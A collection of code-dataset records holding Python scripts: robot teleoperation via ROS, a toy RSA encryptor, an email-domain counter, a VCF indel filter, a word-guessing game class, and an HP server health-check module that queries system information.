+{"seq_id":"462879799","text":"#! /usr/bin/env python\n'''\nAuthor: David Pierce Walker-Howell\nDate Created: 06/03/2020\nDescription: Provide an interface for controlling the smile mobile robot with keyboard\n            teleop.\n'''\nimport rospy\nfrom std_msgs.msg import Int16MultiArray\nfrom pynput import keyboard\nimport sys\nimport numpy as np\n\nclass Keyboard_Teleop:\n    '''\n    Interface command to the robot for controlling the PWM of each motor \n    with keyboard commands.\n    '''\n    def __init__(self, node_name=\"keyboard_teleop\"):\n        '''\n        Initialize the keyboard teleop control.\n\n        Parameters:\n            node_name: The name of the keyboard teleop node. Default: keyboard_teleop\n\n        Returns:\n            N/A\n        '''\n        self.node_name = node_name\n        rospy.init_node(node_name)\n\n        #TOPICS - This format of namespace is given for the ability to simulate multiple robots\n        #by providing different names.\n\n        pwm_topic = rospy.get_namespace() + \"pwm\"\n\n        #Initialize the publisher to the pwm topic\n\n        self.pwm_pub = rospy.Publisher(pwm_topic, Int16MultiArray, queue_size=1)\n        self.pwm_msg = Int16MultiArray()\n        \n        self.pub_timer = rospy.Rate(10)\n        \n        #Initialize the keyboard listener\n        self.listener = keyboard.Listener(\n                            on_press=self.on_press,\n                            on_release=self.on_release)\n\n        self.linear_pwm = 0\n        self.angular_pwm = 0\n        self.linear_go = 0\n        self.angular_go = 0\n\n        #Preset values (min = 0, max = 255)!\n        self.set_linear_pwm_perc = 0.1\n        self.set_angular_pwm_perc = 0.4\n        self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n        self.set_angular_pwm = int(self.set_angular_pwm_perc * 255)\n\n\n    def on_press(self, key):\n        '''\n        Callback function for the keyboard listener to identify which key was\n        pressed.\n\n        Parameters:\n            key:\n        Returns:\n            N/A\n        '''\n        sys.stdout.write(\"\\r                                             \")\n        sys.stdout.flush()\n\n\n        #Ensure w and s aren't read at the same time\n        if(key.char == 'w'): #Forward movement\n            self.linear_go = 1\n        elif(key.char == 's'):\n            self.linear_go = -1\n\n        if(key.char == 'a'):#Left turns\n            self.angular_go = 1\n\n        elif(key.char == 'd'): #Right turns\n            self.angular_go = -1\n        \n        if(key.char == 'i'): #Increase the throttle\n            if(self.set_linear_pwm_perc < 0.9):\n                self.set_linear_pwm_perc += 0.1\n                self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n\n        elif(key.char == 'j'): #Decrease the throttle\n            if(self.set_linear_pwm_perc > 0.1):\n                self.set_linear_pwm_perc -= 0.1\n                self.set_linear_pwm = int(self.set_linear_pwm_perc * 255)\n        \n        \n    def on_release(self, key):\n        '''\n        Callback function for the keyboard listener to identify which key was\n        released.\n\n        Parameters:\n            key:\n        Returns:\n            N/A\n        '''\n        if(key.char == 'w' or key.char == 's'):\n            self.linear_go = 0\n\n        elif(key.char == 'a' or key.char == 'd'):\n            self.angular_go = 0\n        \n        \n    def run(self):\n        '''\n        Main loop to read the keyboard inputs and publish them as pwm values.\n\n        Parameters:\n            N/A\n        Returns:\n            N/A\n        '''\n        self.listener.start()\n        angular_mean_filter = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n        linear_mean_filter = np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0])\n\n\n        try:\n            while not rospy.is_shutdown():\n                \n                #mix the linear and angular pwm's to get the pwm of each motor\n                if(self.linear_go == -1):\n                    self.linear_pwm = -1 * self.set_linear_pwm\n                elif(self.linear_go == 1):\n                    self.linear_pwm = self.set_linear_pwm\n                else:\n                    self.linear_pwm = 0\n                \n                if(self.angular_go == -1):\n                    self.angular_pwm = -1 * self.set_angular_pwm\n                elif(self.angular_go == 1):\n                    self.angular_pwm = self.set_angular_pwm\n                else:\n                    self.angular_pwm = 0\n                \n                #Run the mean average filter to ensure values don't change too fast\n                angular_mean_filter = np.delete(angular_mean_filter, 0); \n                angular_mean_filter = np.append(angular_mean_filter, self.angular_pwm)\n                linear_mean_filter = np.delete(linear_mean_filter, 0); \n                linear_mean_filter = np.append(linear_mean_filter, self.linear_pwm)\n                angular_pwm_filt = np.mean(angular_mean_filter)\n                linear_pwm_filt = np.mean(linear_mean_filter)\n\n                pwm_1 = linear_pwm_filt - angular_pwm_filt\n                pwm_2 = linear_pwm_filt + angular_pwm_filt\n                pwm_3 = linear_pwm_filt + angular_pwm_filt\n                pwm_4 = linear_pwm_filt - angular_pwm_filt\n\n                pwms = [pwm_1, pwm_2, pwm_3, pwm_4]\n                \n                #Bound the pwms if necessary\n                for i in range(4):\n                    if(pwms[i] < -255):\n                        pwms[i] = -255\n                    elif(pwms[i] > 255):\n                        pwms[i] = 255\n                \n                #Publish the pwm to the pwm topic\n                self.pwm_msg.data = pwms\n                self.pwm_pub.publish(self.pwm_msg)\n                \n                self.pub_timer.sleep()\n\n        except rospy.ROSInterruptException:\n            pass\n\nif __name__ == \"__main__\":\n\n\n    keyboard_teleop = Keyboard_Teleop()\n    keyboard_teleop.run()\n\n\n","sub_path":"smile_mobile_robot_ws/src/smile_mobile_robot/src/control/keyboard_teleop.py","file_name":"keyboard_teleop.py","file_ext":"py","file_size_in_byte":5841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
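The run() loop in the teleop record above smooths PWM commands with a 10-sample sliding window; the same filter isolated from the ROS plumbing, with numpy assumed as in the record and illustrative sample inputs:

import numpy as np

window = np.zeros(10)                 # last ten raw commands
for raw in (255, 255, 255, 0, 0):     # illustrative raw PWM samples
    window = np.append(np.delete(window, 0), raw)
print(np.mean(window))                # smoothed value fed to the motors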
+{"seq_id":"461600398","text":"\"\"\"This is a program to encrypt a string with RSA with a predetermined key\nCreated by Fred Nordell, Philip Wester and Vilhelm Dinevik. January 2015 to March 2015\"\"\"\n\n\nimport math\nimport functions\nimport Keys\nimport change\nimport IO\nimport json\n\n\t\nif (__name__==\"__main__\"):\n\tstart = 1 \t\t\t\t\t\t\t\t\t\t\t\t#checks so it's the start of the program and makes getinput() require a string\n\tuE = IO.getInput(start) \t\t\t\t\t\t\t\t#define the string as uE (unEncrypted)\n\tprint (\"Unencrypted: \", change.xChange(uE) , \"\\n\" )\t\t#this calls the function to make the string into a list of numbers that corresponds to a letter\n\tplace = 0\n\tencrypted = []\n\tkey = 1\n\tfor q in change.xChange(uE):\t\t\t\t\t\t\t\n\t\tencrypted.append(functions.encrypt(Keys.chooseKey(key,4)[1] , Keys.chooseKey(key,4)[0] , change.xChange(uE)[place]))\n\t\tplace = place + 1\n\t\t\t\n\tprint (\"\\n\")\n\tprint (\"Encrypted: \", encrypted, \"\\n\" )\n\tprint (\"\\n\")\n\t\n\tf = open('encoded_single.txt', 'w')\n\tQ = str(encrypted)\n\tf.write(Q)\n\t\n\tprint (\"Saved to encoded_single.txt in directory\")\n\tprint (\"\\n\")\n","sub_path":"RSA_Encryption_Single_key.py","file_name":"RSA_Encryption_Single_key.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"176273140","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport smach\nimport smach_ros\nimport random\n\nfrom geometry_msgs.msg import Twist\n\n\nclass YBot():\n    def __init__(self, bot_name=\"NoName\",x = 0,th = 0):\n        # bot name \n        self.name = bot_name\n        # velocity argument\n        self.vel_x = x \n        self.vel_th = th \n        # velocity publisher\n        self.vel_pub = rospy.Publisher('cmd_vel', Twist,queue_size=1)\n\n\n    def strategy(self):\n        r = rospy.Rate(1) # change speed 1fps\n        twist = Twist()\n        twist.linear.x = self.vel_x; twist.linear.y = 0; twist.linear.z = 0\n        twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = self.vel_th\n\n        target_speed = 0\n        target_turn = 0\n        control_speed = 0\n        control_turn = 0\n\n        if not rospy.is_shutdown():\n            print(twist)\n            self.vel_pub.publish(twist)\n\n            r.sleep()\n\n\ndef main():\n    rospy.init_node('Y_run')\n    bot = YBot('Y_test')\n    bot.strategy()\n\n\nif __name__ == '__main__':\n    main()","sub_path":"enemy_bot/enemy_bot_level8/burger_war/scripts/YTest.py","file_name":"YTest.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
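The email-domains record that follows groups addresses by domain with a dict of sets; a compact tally of the same shape using collections.Counter, with the sample addresses taken from its docstring:

from collections import Counter

emails = ['info@mail.ru', 'support@vk.com', 'ddd@rambler.ru', 'roxette@mail.ru']
counts = Counter(e.rsplit('@', 1)[1] for e in emails)
for domain, n in counts.most_common():
    print(domain, n)   # mail.ru 2 / vk.com 1 / rambler.ru 1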
+{"seq_id":"377750158","text":"# -*- coding: utf-8 -*-\n\n\"\"\"«E-mail domains» + tests\nCreate a command-line utility that processes data in the way described\nbelow and prints the result to STDOUT.\nINPUT:\nThe name of a text file is given on the command line.\nA text file with email addresses (newline-separated). Example:\ninfo@mail.ru\nsupport@vk.com\nddd@rambler.ru\nroxette@mail.ru\nsdfsdf@@@@@rdfdf\nexample@localhost\nиван@иванов.рф\nivan@xn--c1ad6a.xn--p1ai\n\nPROCESSING:\nGroup the addresses by domain name and count the email addresses for each domain.\n\nOUTPUT:\nDomain names and the number of addresses in each domain.\nSorted by the number of addresses per domain, in descending order.\nThe number of invalid addresses on a separate line. Example:\nmail.ru 2\nvk.com 1\nrambler.ru 1\nINVALID 1\n\nThe program should be covered by automated tests (unit tests etc.) as\ncompletely as possible, validating every aspect of its behaviour and\ncovering as much of the program code as possible.\nEven though the example is a toy one, what is evaluated is code quality,\nformatting (spaces, indentation, blank lines, separation of logical\nblocks, etc.), modularity, adherence to Python best practices and,\nabove all, the ability to write automated tests.\nThe submitted code must pass flake8.\n\"\"\"\n\nfrom sys import argv\nfrom os.path import isfile\nfrom string import ascii_lowercase, digits\n\n\ndef check_email(email):\n    try:\n        login, domain = email.lower().split('@')\n    except ValueError:\n        \"\"\"Multiple @ characters are not allowed in an email\"\"\"\n        return False\n\n    if login.startswith('.') or login.endswith('.'):\n        \"\"\"The local part must not start or end with a dot\"\"\"\n        return False\n\n    if '..' in login:\n        \"\"\"Two or more consecutive dots are not allowed\"\"\"\n        return False\n\n    for i in login:\n        if i not in ascii_lowercase + digits + '.+_-':\n            \"\"\"Allowed local-part characters\"\"\"\n            return False\n\n    if '.' not in domain or '---' in domain:\n        \"\"\"The domain must be dot-separated; more than two dashes are not allowed\"\"\"\n        return False\n\n    for i in domain:\n        if i not in ascii_lowercase + digits + '.-':\n            \"\"\"Reject local addresses as invalid\"\"\"\n            return False\n\n    if len([i for i in domain if i not in digits + '.-']) < 3:\n        \"\"\"The length must be greater than 3 (at least a.ru)\"\"\"\n        return False\n\n    return True\n\n\ndef main(f_name):\n\n    res = dict()\n    res['INVALID'] = set()\n\n    with open(f_name) as f:\n        for line in f.readlines():\n            if not check_email(line[:-1]):\n                res['INVALID'].add(line[:-1])\n                continue\n\n            login, domain = line[:-1].split('@')\n            if domain not in res:\n                res[domain] = set()\n            res[domain].add(login)\n\n    return res\n\n\nif __name__ == \"__main__\":\n\n    if len(argv) == 1 or not isfile(argv[1]):\n        print('usage: {} <filename>'.format(argv[0]))\n        exit(2)\n\n    result = main(argv[1])\n    _invalid = result.pop('INVALID')\n\n    for i in sorted(result, key=lambda x: len(result[x]), reverse=True):\n        print(i, len(result[i]))\n\n    print('INVALID', len(_invalid))\n","sub_path":"emaildomains.py","file_name":"emaildomains.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"481805003","text":"# Compute the insertion/deletion length of indels in the VCF and select sites with an indel length >= 5 for primer design\n\n\n#!/PERSONALBIO/Work/Genome/G04/software/miniconda3/bin/python\n# -*- encoding: utf-8 -*-\n\nInsertion = open('Insertion.xls','w')\nDeletion= open('Deletion.xls','w')\nwith open('indels.vcf','r') as f1:\n    for line in f1:\n        a = []\n        b = []\n        line = line.strip()\n        lst = line.split('\\t')\n        a = lst[3].split(',')\n        b = lst[4].split(',')\n        #alen = len(max(a, key=len, default=''))\n        #blen = len(max(b, key=len, default=''))\n        alen = [len(i) for i in a]\n        blen = [len(i) for i in b]\n        if max(blen) - min(alen) >= 5:\n            MAX = max(blen) - min(alen)\n            Insertion.write(lst[0]+'\\t'+lst[1]+'\\t'+lst[3]+'\\t'+lst[4]+'\\t'+str(MAX)+'\\n')\n        if max(alen) - min(blen) >= 5:\n            MIN = max(alen) - min(blen)\n            Deletion.write(lst[0]+'\\t'+lst[1]+'\\t'+lst[3]+'\\t'+lst[4]+'\\t'+str(MIN)+'\\n')\n","sub_path":"indel_length.py","file_name":"indel_length.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"542125390","text":"from phrasehunter.character import Character\n\n\nclass Phrase:\n    \"\"\"\n    Controls creation and formatting of one phrase for the game\n    \"\"\"\n    # 
Class global constant - an approx maximum number of phrase characters\n # to print on one line\n PRINT_LEN = 60\n\n def __init__(self, phrase):\n '''\n :param phrase:\n :type phrase:\n Attributes:\n phrasestr (str): the phrase, in string format\n phrase (list of Character): the phrase as a list of Characters\n author (str): the author of the quote\n '''\n self.phrasestr = self.format_phrase(phrase[0])\n self.phrase = [Character(char) for char in self.phrasestr]\n self.author = phrase[1]\n\n\n def format_phrase(self, phrase):\n '''\n Some of the phrases (quotes) are longer that what will display normally on one line.\n this function is an initial formatting of phrases which are longer than a\n defined value (class global constant) to insert some newline (\\n) characters\n so they will display on multiple lines - hence more readable.\n Takes a pretty simplistic approach - loops through the characters in the phrase\n keeping count. For each space character after the count hits the defined limit,\n replace with a newline \\n\n :param: phrase = string version of phrase\n :return: modified string with newlines inserted\n :rtype: str\n '''\n count = 0\n phrasel = list(phrase)\n for index, char in enumerate(phrasel):\n if char == ' ' and count > self.PRINT_LEN:\n phrasel[index] = '\\n'\n count = 0\n count += 1\n return ''.join(phrasel)\n\n def display_phrase(self):\n '''\n Display phrase during game. Guessed characters are revealed but characters not\n guessed yet display as an underscore _\n :return: None\n :rtype: None\n '''\n print('\\n')\n for char in self.phrase:\n print_char = char.display_char()\n print(print_char, end=' ')\n print('\\n')\n\n def show_full_quoted_phrase(self):\n \"\"\"\n Displays full (no characters hidden) quote, with author at end of game.\n :return: A string consisting of string representation of quote + the author.\n Newline between end of quote and author.\n :rtype: str\n \"\"\"\n return '\"' + self.phrasestr + '\"\\n - ' + self.author\n\n def check_guess(self, guess):\n \"\"\"\n Check player's guess. 
Compare guessed character to the characters in the\n phrase, pass to Character class to update phrase character guessed value.\n :param guess: guessed character\n :type guess: str\n :return: good_guess: True or False - Was character in phrase or not\n :rtype: bool\n \"\"\"\n good_guess = False\n for char in self.phrase:\n if not char.guessed:\n char.set_guessed(guess)\n if char.guessed:\n good_guess = True\n return good_guess\n\n def check_if_won(self):\n \"\"\"\n Check if player has won the game !\n If all characters in the phrase are guessed, then it is a yes.\n :return: True or False, won game or not\n :rtype: bool\n \"\"\"\n for char in self.phrase:\n if not char.guessed:\n return False\n return True\n","sub_path":"phrasehunter/phrase.py","file_name":"phrase.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"284957296","text":"# Embedded file name: /hp/support/health/bin/modules/computeNode.py\r\nimport logging\r\nimport os\r\nimport subprocess\r\nimport re\r\nimport shutil\r\nfrom fusionIOUtils import checkFusionIOFirmwareUpgradeSupport\r\nfrom computeNodeInventory import ComputeNodeInventory, Gen1ScaleUpComputeNodeInventory\r\n\r\nclass ComputeNode:\r\n\r\n def __init__(self, healthResourceDict, ip):\r\n self.healthResourceDict = healthResourceDict\r\n self.computeNodeDict = {}\r\n try:\r\n self.healthBasePath = self.healthResourceDict['healthBasePath']\r\n logLevel = self.healthResourceDict['logLevel']\r\n logBaseDir = self.healthResourceDict['logBaseDir']\r\n self.versionInformationLog = self.healthResourceDict['versionInformationLog']\r\n except KeyError as err:\r\n raise KeyError(str(err))\r\n\r\n self.computeNodeDict['ip'] = ip\r\n hostname = os.uname()[1]\r\n self.computeNodeDict['hostname'] = hostname\r\n computeNodeLog = logBaseDir + 'computeNode_' + hostname + '.log'\r\n handler = logging.FileHandler(computeNodeLog)\r\n self.loggerName = ip + 'Logger'\r\n self.computeNodeDict['loggerName'] = self.loggerName\r\n logger = logging.getLogger(self.loggerName)\r\n if logLevel == 'debug':\r\n logger.setLevel(logging.DEBUG)\r\n else:\r\n logger.setLevel(logging.INFO)\r\n formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(message)s', datefmt='%m/%d/%Y %H:%M:%S')\r\n handler.setFormatter(formatter)\r\n logger.addHandler(handler)\r\n\r\n def computeNodeInitialize(self, computeNodeResources, versionInformationLogOnly, updateOSHarddrives):\r\n logger = logging.getLogger(self.loggerName)\r\n resultDict = {'updateNeeded': False,\r\n 'errorMessages': []}\r\n command = 'dmidecode -s system-product-name'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n out = out.strip()\r\n logger.debug('The output of the command (' + command + \") used to get the system's model was: \" + out)\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's model information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's model information.\")\r\n return resultDict\r\n else:\r\n try:\r\n systemModel = re.match('[a-z,0-9]+\\\\s+(.*)', out, re.IGNORECASE).group(1).replace(' ', '')\r\n except AttributeError as err:\r\n logger.error(\"There was a system model match error when trying to match against '\" + out + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a system model match error.')\r\n return resultDict\r\n\r\n try:\r\n if systemModel not 
in self.healthResourceDict['supportedComputeNodeModels']:\r\n logger.error(\"The system's model (\" + systemModel + ') is not supported by this CSUR bundle.')\r\n resultDict['errorMessages'].append(\"The system's model is not supported by this CSUR bundle.\")\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + \") was not present in the application's resource file.\")\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n logger.debug(\"The system's model was determined to be: \" + systemModel + '.')\r\n self.computeNodeDict['systemModel'] = systemModel\r\n if systemModel == 'DL580Gen9':\r\n command = 'dmidecode -s processor-version'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n out = out.strip()\r\n logger.debug('The output of the command (' + command + ') used to get the processor version was: ' + out)\r\n if result.returncode != 0:\r\n logger.error('Unable to get the processor version.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to get the processor version information.')\r\n return resultDict\r\n try:\r\n processorVersion = re.search('CPU (E\\\\d-\\\\s*\\\\d{4}\\\\w* v\\\\d)', out).group(1).replace(' ', '')\r\n except AttributeError as err:\r\n logger.error(\"There was a processor match error when trying to match against '\" + out + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a processor match error.')\r\n return resultDict\r\n\r\n logger.debug(\"The processor's version was determined to be: \" + processorVersion + '.')\r\n else:\r\n processorVersion = ''\r\n self.computeNodeDict['processorVersion'] = processorVersion\r\n command = 'cat /proc/version'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to get the OS distribution information was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's OS distribution version information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's OS distribution version information.\")\r\n return resultDict\r\n versionInfo = out.lower()\r\n if 'suse' in versionInfo:\r\n OSDist = 'SLES'\r\n command = 'cat /etc/SuSE-release'\r\n else:\r\n OSDist = 'RHEL'\r\n command = 'cat /etc/redhat-release'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's OS distribution level.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's OS distribution level.\")\r\n return resultDict\r\n releaseInfo = out.replace('\\n', ' ')\r\n if OSDist == 'SLES':\r\n try:\r\n slesVersion = re.match('.*version\\\\s*=\\\\s*([1-4]{2})', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was a SLES OS version match error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a SLES OS version match error.')\r\n return resultDict\r\n\r\n try:\r\n slesPatchLevel = re.match('.*patchlevel\\\\s*=\\\\s*([1-4]{1})', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was a SLES patch level match 
error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a SLES patch level match error.')\r\n return resultDict\r\n\r\n osDistLevel = OSDist + slesVersion + '.' + slesPatchLevel\r\n else:\r\n try:\r\n rhelVersion = re.match('.*release\\\\s+([6-7]{1}.[0-9]{1}).*', releaseInfo, re.IGNORECASE).group(1)\r\n except AttributeError as err:\r\n logger.error(\"There was a RHEL OS version match error when trying to match against '\" + releaseInfo + \"':\\n\" + str(err) + '.')\r\n resultDict['errorMessages'].append('There was a RHEL OS version match error.')\r\n return resultDict\r\n\r\n osDistLevel = OSDist + rhelVersion\r\n try:\r\n if osDistLevel not in self.healthResourceDict['supportedDistributionLevels']:\r\n if osDistLevel not in self.healthResourceDict['unsupportedUpgradableDistLevels']:\r\n logger.error(\"The system's OS distribution level (\" + osDistLevel + ') is not supported by this CSUR bundle.')\r\n resultDict['errorMessages'].append(\"The system's OS distribution level is not supported by this CSUR bundle.\")\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n logger.debug(\"The system's OS distribution level was determined to be: \" + osDistLevel + '.')\r\n self.computeNodeDict['osDistLevel'] = osDistLevel\r\n if not versionInformationLogOnly:\r\n if 'DL380' in systemModel:\r\n command = '/opt/cmcluster/bin/cmviewcl -f line'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the cluster is running was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.warn('Unable to check if the cluster is running.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to check if the cluster is running.')\r\n clusterView = out.splitlines()\r\n for line in clusterView:\r\n if re.search('^status=', line):\r\n if re.match('status=up', line):\r\n logger.warn('It appears that the cluster is still running.\\n' + out)\r\n resultDict['errorMessages'].append('It appears that the cluster is still running.')\r\n\r\n if not 'DL380' in systemModel:\r\n if not 'DL320' in systemModel:\r\n command = 'ps -C hdbnameserver,hdbcompileserver,hdbindexserver,hdbpreprocessor,hdbxsengine,hdbwebdispatcher'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if SAP is running was: ' + out.strip())\r\n if result.returncode == 0:\r\n logger.warn('It appears that SAP HANA is still running.\\n' + out)\r\n resultDict['errorMessages'].append('It appears that SAP HANA is still running.')\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n command = 'mount'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the log partition is mounted was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error('Unable to check if the log partition is mounted.\\n' + err)\r\n resultDict['errorMessages'].append('Unable to check if the log partition is mounted.')\r\n 
return resultDict\r\n if re.search('/hana/log|/HANA/IMDB-log', out, re.MULTILINE | re.DOTALL) != None:\r\n logger.error('The log partition is still mounted.')\r\n resultDict['errorMessages'].append('The log partition needs to be unmounted before the system is updated.')\r\n return resultDict\r\n command = 'uname -r'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n kernel = out.strip()\r\n logger.debug('The output of the command (' + command + ') used to get the currently used kernel was: ' + kernel)\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's current kernel information.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's current kernel information.\")\r\n return resultDict\r\n logger.debug('The currently used kernel was determined to be: ' + kernel + '.')\r\n self.computeNodeDict['kernel'] = kernel\r\n command = 'uname -p'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n processorType = out.strip()\r\n logger.debug('The output of the command (' + command + \") used to get the compute node's processor type was: \" + processorType)\r\n if result.returncode != 0:\r\n logger.error(\"Unable to get the system's processor type.\\n\" + err)\r\n resultDict['errorMessages'].append(\"Unable to get the system's processor type.\")\r\n return resultDict\r\n logger.debug(\"The compute node's processor type was determined to be: \" + processorType + '.')\r\n self.computeNodeDict['processorType'] = processorType\r\n try:\r\n if not checkFusionIOFirmwareUpgradeSupport(self.healthResourceDict['fusionIOFirmwareVersionList'], self.loggerName):\r\n resultDict['errorMessages'].append('The fusionIO firmware is not at a supported version for an automatic upgrade.')\r\n return resultDict\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n if not updateOSHarddrives:\r\n result = self.__checkDrivers(computeNodeResources, systemModel, osDistLevel)\r\n if result != '':\r\n resultDict['errorMessages'].append(result)\r\n return resultDict\r\n try:\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n computeNodeInventory = Gen1ScaleUpComputeNodeInventory(self.computeNodeDict.copy(), self.healthResourceDict['noPMCFirmwareUpdateModels'], computeNodeResources, self.healthResourceDict.copy())\r\n else:\r\n computeNodeInventory = ComputeNodeInventory(self.computeNodeDict.copy(), self.healthResourceDict['noPMCFirmwareUpdateModels'], computeNodeResources, self.healthResourceDict.copy())\r\n except KeyError as err:\r\n logger.error('The resource key (' + str(err) + ') was not present in the resource file.')\r\n resultDict['errorMessages'].append('A resource key error was encountered.')\r\n return resultDict\r\n\r\n if not updateOSHarddrives:\r\n computeNodeInventory.getComponentUpdateInventory()\r\n else:\r\n computeNodeInventory.getLocalHardDriveFirmwareInventory()\r\n if computeNodeInventory.getInventoryStatus():\r\n resultDict['errorMessages'].append(\"Errors were encountered during the compute node's inventory.\")\r\n return resultDict\r\n if versionInformationLogOnly:\r\n if os.path.isfile(self.versionInformationLog):\r\n try:\r\n shutil.copy(self.versionInformationLog, self.healthBasePath)\r\n 
except IOError as err:\r\n logger.error('I/O error while copying ' + self.versionInformationLog + ' to ' + self.healthBasePath)\r\n\r\n return resultDict\r\n componentUpdateDict = computeNodeInventory.getComponentUpdateDict()\r\n if updateOSHarddrives:\r\n if len(componentUpdateDict['Firmware']) != 0:\r\n self.computeNodeDict['componentUpdateDict'] = componentUpdateDict\r\n resultDict['updateNeeded'] = True\r\n else:\r\n componentDictSizes = [len(d) for d in componentUpdateDict.values()]\r\n if any((x != 0 for x in componentDictSizes)):\r\n self.computeNodeDict['componentUpdateDict'] = componentUpdateDict\r\n resultDict['updateNeeded'] = True\r\n if 'FusionIO' in componentUpdateDict['Firmware']:\r\n self.computeNodeDict['busList'] = computeNodeInventory.getFusionIOBusList()\r\n self.computeNodeDict['externalStoragePresent'] = computeNodeInventory.isExternalStoragePresent()\r\n return resultDict\r\n\r\n def __checkDrivers(self, computeNodeResources, systemModel, osDistLevel):\r\n errorMessage = ''\r\n logger = logging.getLogger(self.loggerName)\r\n driversFound = False\r\n started = False\r\n mlnxDriverFound = False\r\n for data in computeNodeResources:\r\n data = data.replace(' ', '')\r\n if re.match('^#', data):\r\n continue\r\n if not re.match('^Drivers:\\\\s*$', data) and not driversFound:\r\n continue\r\n elif 'Drivers' in data:\r\n driversFound = True\r\n continue\r\n elif osDistLevel in data and not systemModel in data and not started:\r\n continue\r\n elif osDistLevel in data and systemModel in data:\r\n started = True\r\n continue\r\n elif re.match('\\\\s*$', data):\r\n break\r\n else:\r\n computeNodeDriverList = data.split('|')\r\n computeNodeDriver = computeNodeDriverList[0]\r\n command = 'modinfo ' + computeNodeDriver\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the ' + computeNodeDriver + ' driver is loaded was: ' + out.strip())\r\n if result.returncode != 0:\r\n if (computeNodeDriver == 'mlx4_en' or computeNodeDriver == 'mlnx') and not mlnxDriverFound:\r\n mlnxDriverFound = True\r\n continue\r\n logger.error('The ' + computeNodeDriver + ' driver does not appear to be loaded.\\n' + err)\r\n errorMessage = 'The ' + computeNodeDriver + ' driver does not appear to be loaded.'\r\n return errorMessage\r\n\r\n if systemModel == 'DL580G7' or systemModel == 'DL980G7':\r\n command = 'modinfo iomemory_vsl'\r\n result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\n out, err = result.communicate()\r\n logger.debug('The output of the command (' + command + ') used to check if the iomemory_vsl driver is loaded was: ' + out.strip())\r\n if result.returncode != 0:\r\n logger.error('The iomemory_vsl driver does not appear to be loaded.\\n' + err)\r\n errorMessage = 'The iomemory_vsl driver does not appear to be loaded.'\r\n return errorMessage\r\n\r\n def 